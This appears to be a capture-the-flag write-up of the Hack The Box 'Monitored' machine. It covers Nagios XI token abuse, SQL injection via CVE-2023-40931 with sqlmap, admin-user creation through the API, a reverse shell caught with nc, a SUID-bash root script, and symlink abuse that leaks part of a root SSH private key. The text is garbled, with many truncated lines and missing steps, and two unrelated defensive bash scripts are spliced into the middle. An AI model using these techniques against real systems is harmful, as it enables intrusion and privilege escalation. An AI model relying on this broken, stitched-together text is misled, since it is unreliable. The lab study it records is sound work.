HTB: Monitored
🏷 hackthebox htb-monitored feroxbuster burp burp-repeater ctf nmap nagios nagiosxi ldapsearch snmpwalk cve-2023-40931 sqli sqlmap symbolic-link nagios-api api-fuzz
Box Info
Name: Monitored
OS: Linux
Recon
nmap
nmap finds five open TCP ports, SSH (22), HTTP (80), LDAP (389), HTTPS (443), and something unknown on 5667:
NTP will be useful if I need to sync clocks. I’ll want to enumerate SNMP as well.
As far as the tech stack, I know it’s Nagios, and that the site is PHP-based. I can’t find a version number, other than the copyright says 2008-2024. I won’t bother yet with a directory brute force, as it is public software.
#
dn:
namingContexts: dc=monitored,dc=htb
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
I can try to dump more, and it returns something, but not much:
# monitored.htb
dn: dc=monitored,dc=htb
objectClass: top
objectClass: dcObject
objectClass: organization
o: monitored.htb
dc: monitored
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
It fails. nc doesn’t work either. It just hangs, and when I type anything,
it exits.
Shell as nagios
Validate Credentials
Using the creds from SNMP on the Nagios login shows a failure
message:
That suggests that these creds are good, but that the account has been
disabled.
After thinking this would be easily documented, I’ll give up and start
fuzzing.
Manual Fuzzing
I’ll get a request going in Burp Repeater and poke at the API manually a bit. If I try /nagiosxi/api, it returns a 301 to /nagiosxi/api/:
Feroxbuster
I’ll use feroxbuster to brute force the API. I’ll use the -m GET,POST option to try both GET and POST requests, and -k to accept the invalid TLS certificate. I’m starting at /nagiosxi/api, and it finds v1 quickly (as well as includes):
Finding Parameters
Access Nagios
apikey Fail
Following what I learned from the documentation above, I’ll try to visit
nagiosxi/api/v1/system/status with an apikey GET parameter.
Even on a fresh request of a new API key to make sure it’s not expired, it
returns invalid:
More Research
The first result is this 2020 forum post with this in the first answer:
It uses token as the parameter name in the returned result. It also uses a valid_min POST parameter alongside the username and password to set the validity time. Adding this does get the server to return that it has a longer validity time, but it still seems to expire quickly.
token Parameter
I’ll notice that the path in the successful token auth isn’t in the /api/ part of the server. Could this work on the main page? I’ll try visiting /nagiosxi/?token=[token]:
Not only does it work, but it seems to validate my cookie so that I don’t
need to keep it in the URL to visit other pages.
Going to the account settings, I’ll find the API key for the svc user:
CVE-2023-40931 Background
Many of these are 7 months old, which means they were out before Monitored was released, so I consider them in bounds for solving. CVE-2023-40931 is a:
The team at Output24 that found this vuln (and three others)
documented a bit more about them in this post:
SQLI POC
I’ll try to build the same request described here. I always try to remove
unnecessary headers, leaving this request:
sqlmap
Typically I like to show manually doing the injection, but the database here is large, so I’ll go right to sqlmap. For some reason this was a bit tricky to get working with sqlmap. What eventually works for me is building the command based on the advisory:
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER
Payload: id=3 OR (SELECT 7131 FROM(SELECT COUNT(*),CONCAT
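From the defender’s side, the two request shapes described above are worth recognising in web server logs: a token handed over in the URL outside the API path (the same token then lands in access logs and any proxy logs), and the error-based injection string that sqlmap reported. The bash script below is an added example, not part of this write-up or of Nagios XI. It assumes Apache combined-format access logs; the log lines are constructed for the demo, the token and API key values are redacted placeholders, and /nagiosxi/PLACEHOLDER.php stands in for the vulnerable endpoint, which this page does not name.

```shell
#!/usr/bin/env bash
# Added example (not from the original write-up). Flags two request shapes in
# Apache combined-format access logs:
#   1. a `token=` parameter presented outside /nagiosxi/api/ (the write-up shows
#      this authenticating the main site and setting a session cookie), and
#   2. query strings carrying error-based SQL injection fragments like the one
#      sqlmap reported (... SELECT ... FROM(SELECT COUNT(*),CONCAT ...).
# The log lines are constructed; /nagiosxi/PLACEHOLDER.php and the REDACTED_*
# values are placeholders, not values from the box. Requires bash (for the
# parameter-expansion decoder) plus awk and grep.

SAMPLE_LOG='10.10.14.6 - - [09/May/2024:08:50:01 +0000] "GET /nagiosxi/login.php HTTP/1.1" 200 5120
10.10.14.6 - - [09/May/2024:08:50:09 +0000] "GET /nagiosxi/api/v1/system/status?apikey=REDACTED_KEY HTTP/1.1" 200 310
10.10.14.6 - - [09/May/2024:08:51:22 +0000] "GET /nagiosxi/?token=REDACTED_TOKEN HTTP/1.1" 302 0
10.10.14.6 - - [09/May/2024:08:52:40 +0000] "GET /nagiosxi/PLACEHOLDER.php?id=3 HTTP/1.1" 200 812
10.10.14.6 - - [09/May/2024:08:52:41 +0000] "GET /nagiosxi/PLACEHOLDER.php?id=3%20OR%20%28SELECT%207131%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x71%29%29x%29 HTTP/1.1" 200 1033'

# Percent-decode one URL fragment: '+' becomes a space, %HH becomes the byte.
url_decode() {
  local s=${1//+/ }
  printf '%b' "${s//%/\\x}"
}

# Read combined-format lines on stdin; print one "<rule>\t<decoded path>" per hit.
scan_log() {
  local line req path query
  while IFS= read -r line; do
    # Field 7 is the request path inside the quoted "METHOD path HTTP/x" triple.
    req=$(printf '%s\n' "$line" | awk '{print $7}')
    [ -n "$req" ] || continue
    path=$(url_decode "$req")
    query=${path#*\?}
    [ "$query" = "$path" ] && query=""
    # Rule 1: a token parameter anywhere except the API tree.
    case "$path" in
      /nagiosxi/api/*) ;;   # apikey/token on the API path is normal API use
      *) case "$query" in
           *token=*) printf 'token-outside-api\t%s\n' "$path" ;;
         esac ;;
    esac
    # Rule 2: SQL keywords in the decoded query string (deliberately short list).
    if printf '%s' "$query" | grep -qiE '(select|union|concat\(|information_schema|sleep\()'; then
      printf 'sqli-pattern\t%s\n' "$path"
    fi
  done
}

# Wrapper over the constructed sample so the block runs stand-alone.
scan_sample() {
  printf '%s\n' "$SAMPLE_LOG" | scan_log
}

scan_sample
```

Run it as-is to see the two flagged lines; pipe a real access log into scan_log for the same rules over live data. The keyword list is short on purpose and the decoder handles only percent-encoding, so treat this as the seed of a detection rule rather than a finished one.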
Database Enumeration
From here I can enumerate the database. There are two DBs:
oxdf@hacky$ sqlmap -u "https://nagios.monitored.htb/nagiosxi/
...[snip]...
available databases [2]:
[*] information_schema
[*] nagiosxi
...[snip]...
There are two users, svc and admin. Neither hash cracks in hashcat with rockyou.txt. But there is an API key for each user as well.
I’ll go back to the original API example from the PDF above, and with
admin’s API key it works!
I’ll go back to the API and fuzz it some more, this time passing the API key. The webserver is pretty slow, so I’m going to use a smaller API-focused wordlist:
oxdf@hacky$ feroxbuster -u https://nagios.monitored.htb/nagio
Unlike api and v1, which redirected to api/ and v1/, here paths that are not specific endpoints return 200. For example, system:
I don’t find anything in user or User, but in system, I’ll find a couple of interesting-looking endpoints:
oxdf@hacky$ feroxbuster -u https://nagios.monitored.htb/nagio
command
User
I can create a new user, but how does that help advance my access?
Searching for this endpoint returns a very old exploit:
This exploit won’t work here, but it does show using this endpoint with
the following data:
I don’t yet have admin access to the site, just the API, so I’ll try to create
an admin user I can authenticate as.
The user is created. I’ll try logging into the site. It returns a License
Agreement:
Shell
Enumeration
Execution
There’s nothing really to run the command here. Back on the Core
Config page, I’ll go to “Hosts”:
There’s a “Check command” dropdown, which I’ll set to “0xdf shell”, and
now a “Run Check Command” button appears:
I’ll click it (and the next button in the popup), and it hangs, but there’s a shell at nc:
oxdf@hacky$ nc -lnvp 443
Listening on 0.0.0.0 443
Connection received on 10.10.11.248 53976
bash: cannot set terminal process group (61550): Inappropriat
bash: no job control in this shell
nagios@monitored:~$
Shell as root
Enumeration
sudo
sudo -l shows that the nagios user has 21 commands they can run as
root:
nagios@monitored:~$ sudo -l
Matching Defaults entries for nagios on localhost:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/
User nagios may run the following commands on localhost:
(root) NOPASSWD: /etc/init.d/nagios start
(root) NOPASSWD: /etc/init.d/nagios stop
(root) NOPASSWD: /etc/init.d/nagios restart
(root) NOPASSWD: /etc/init.d/nagios reload
(root) NOPASSWD: /etc/init.d/nagios status
(root) NOPASSWD: /etc/init.d/nagios checkconfig
(root) NOPASSWD: /etc/init.d/npcd start
(root) NOPASSWD: /etc/init.d/npcd stop
(root) NOPASSWD: /etc/init.d/npcd restart
(root) NOPASSWD: /etc/init.d/npcd reload
(root) NOPASSWD: /etc/init.d/npcd status
(root) NOPASSWD: /usr/bin/php
/usr/local/nagiosxi/scripts/components/autodiscover_n
(root) NOPASSWD: /usr/bin/php /usr/local/nagiosxi/scripts
(root) NOPASSWD: /usr/bin/php
/usr/local/nagiosxi/scripts/migrate/migrate.php *
(root) NOPASSWD: /usr/local/nagiosxi/scripts/components/g
(root) NOPASSWD: /usr/local/nagiosxi/scripts/upgrade_to_l
(root) NOPASSWD: /usr/local/nagiosxi/scripts/change_timez
(root) NOPASSWD: /usr/local/nagiosxi/scripts/manage_servi
(root) NOPASSWD: /usr/local/nagiosxi/scripts/reset_config
(root) NOPASSWD: /usr/local/nagiosxi/scripts/manage_ssl_c
(root) NOPASSWD: /usr/local/nagiosxi/scripts/backup_xi.sh
The first 11 commands are from /etc/init.d for the nagios and npcd binaries. Neither of these is present on Monitored:
nagios@monitored:~$ ls /etc/init.d/
anacron cron networking shelli
apache2 dbus ntp slapd
apache-htcacheclean exim4 open-vm-tools snmpd
apparmor hwclock.sh postgresql snmptr
auditd keyboard-setup.sh procps snmptt
bluetooth kmod rsync ssh
console-setup.sh mariadb rsyslog sudo
Next I’ll review each script and think about ways I might abuse it. I
suspect there are many ways to abuse these scripts to get execution as
root. I’ll show two:
[Diagram: two paths from "Shell as nagios" to "Shell as root", labelled intended and unintended]
Nagios Service
manage_services.sh
action=$1
Permissions
Scripts like LinPEAS will check these services for dangerous permissions, but it’s more fun to do it on my own. I’ll start a bash loop to check for all these services:
There are six installed. I’ll loop over those with a command that reads each service file, greps for any line with Exec, and extracts the binary called there. Then I’ll run ls -l on that binary:
The top two are interesting! They are both owned by the nagios user!
Execute
#!/bin/bash
cp /bin/bash /tmp/0xdf
chown root:root /tmp/0xdf
chmod 6777 /tmp/0xdf
I’ll copy that to nagios, and set the permissions so that it’s executable:
nagios@monitored:/usr/local/nagios/bin$ /tmp/0xdf -p
0xdf-5.1#
getprofile.sh
Understanding the Script
# GRAB THE ID
folder=$1
if [ "$folder" == "" ]; then
echo "You must enter a folder name/id to generate a prof
echo "Example: ./getprofile.sh <id>"
exit 1
fi
The rest of the script is running tail on various files and saving the
output in the new folder structure. For example:
echo "Creating eventman.txt..."
tail -n500 /usr/local/nagiosxi/var/eventman.log > "/usr/loca
I’ll use grep to look at all the files that are passed to tail:
Almost all of these are in /var/log, where nagios can’t write. Still, the last one is in the /usr/local/nagiosxi directory. The section of code looks like:
At the end, it puts all the collected files into a Zip archive:
Abusing Symlink
nagios@monitored:~$ ls -l /usr/local/nagiosxi/tmp/phpmailer.l
-rw-r--r-- 1 nagios nagios 0 Nov 10 15:14 /usr/local/nagiosxi
That means I can modify it. The existing file is empty. I’ll overwrite it with a symlink:
nagios@monitored:/usr/local/nagiosxi/var/components$ ls
auditlog.log capacityplanning.log profile profile.zip
It has 61 files:
nagios@monitored:/usr/local/nagiosxi/var/components$ unzip -l
Archive: profile.zip
Length Date Time Name
--------- ---------- ----- ----
0 2024-05-09 08:57 profile-1715259437/
8761 2024-05-09 08:57 profile-1715259437/config.inc.p
159185 2024-05-09 08:57 profile-1715259437/xi_usermeta.
75 2024-05-09 08:57 profile-1715259437/iptables.txt
19818 2024-05-09 08:57 profile-1715259437/top.txt
825 2024-05-09 08:57 profile-1715259437/ip_addr.txt
29365 2024-05-09 08:57 profile-1715259437/1715254696.t
779 2024-05-09 08:57 profile-1715259437/filesystem.t
nagios@monitored:/usr/local/nagiosxi/var/components$ unzip -p
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAA
NhAAAAAwEAAQAAAYEAnZYnlG22OdnxaaK98DJMc9isuSgg9wtjC0r1iTzlSRV
FSINj1byqeOkrieC8Ftrte+9eTrvfk7Kpa8WH0S0LsotASTXjj4QCuOcmgq9I
...[snip]...
CNvArnlhyB8ZevAAAADnJvb3RAbW9uaXRvcmVkAQIDBA==
-----END OPENSSH PRIVATE KEY-----
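The root cause in this section is a privileged script running tail on a file that sits in a directory the service account can write to, so that account can swap the file for a symlink and have root copy the target into the archive. A hardened reader, as an added bash example (not code from getprofile.sh or from the write-up), refuses symlinks, checks that the resolved path is still inside the expected directory, and checks the owner before reading. It assumes GNU coreutils (readlink -f, stat -c); the directory names and file contents in the demo are constructed.

```shell
#!/usr/bin/env bash
# Added example (not code from getprofile.sh or the write-up). A guarded
# replacement for "root runs tail on a log the service account can replace".
# Before reading, it refuses symlinks, rejects files whose owner is not the
# expected account, and checks that the resolved path stays under the directory
# the script expects. Uses GNU readlink/stat (Linux).

# safe_tail <expected_dir> <expected_owner> <file> [lines]
# Prints the last [lines] (default 500) lines of <file> only if every check
# passes; otherwise prints a reason on stderr and returns 1.
safe_tail() {
  local dir=$1 owner=$2 file=$3 lines=${4:-500}
  local resolved real_dir
  if [ -L "$file" ]; then
    echo "refusing symlink: $file" >&2; return 1
  fi
  if [ ! -f "$file" ]; then
    echo "not a regular file: $file" >&2; return 1
  fi
  # Resolve both sides so dir/../../etc/... cannot slip past a prefix check.
  resolved=$(readlink -f -- "$file") || return 1
  real_dir=$(readlink -f -- "$dir") || return 1
  case "$resolved" in
    "$real_dir"/*) ;;
    *) echo "outside $real_dir: $resolved" >&2; return 1 ;;
  esac
  # Owner check also catches a hard link to someone else's file.
  if [ "$(stat -c '%U' -- "$resolved")" != "$owner" ]; then
    echo "unexpected owner on $resolved" >&2; return 1
  fi
  tail -n "$lines" -- "$resolved"
}

# Constructed demo: a legitimate log and a symlink planted beside it, pointing
# at a file that stands in for something only root should read.
demo_safe_tail() {
  local tmp me rc_ok=0 rc_link=0 shown
  tmp=$(mktemp -d)
  me=$(id -un)
  mkdir -p "$tmp/var" "$tmp/secret"
  printf 'line1\nline2\nline3\n' > "$tmp/var/phpmailer.log"
  printf 'SENSITIVE\n' > "$tmp/secret/id_rsa"
  ln -s "$tmp/secret/id_rsa" "$tmp/var/planted.log"
  shown=$(safe_tail "$tmp/var" "$me" "$tmp/var/phpmailer.log" 2 | paste -sd, -) || rc_ok=$?
  safe_tail "$tmp/var" "$me" "$tmp/var/planted.log" 2 >/dev/null 2>&1 || rc_link=$?
  rm -rf "$tmp"
  printf 'ok=%s link=%s shown=%s\n' "$rc_ok" "$rc_link" "$shown"
}

demo_safe_tail
```

The legitimate log is read and the planted symlink is rejected. The checks are still separate from the tail call, so a file swapped between check and read is not covered; the durable fix is to not read from a service-account-writable location as root at all, or to drop privileges to that account before reading.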
SSH
0xdf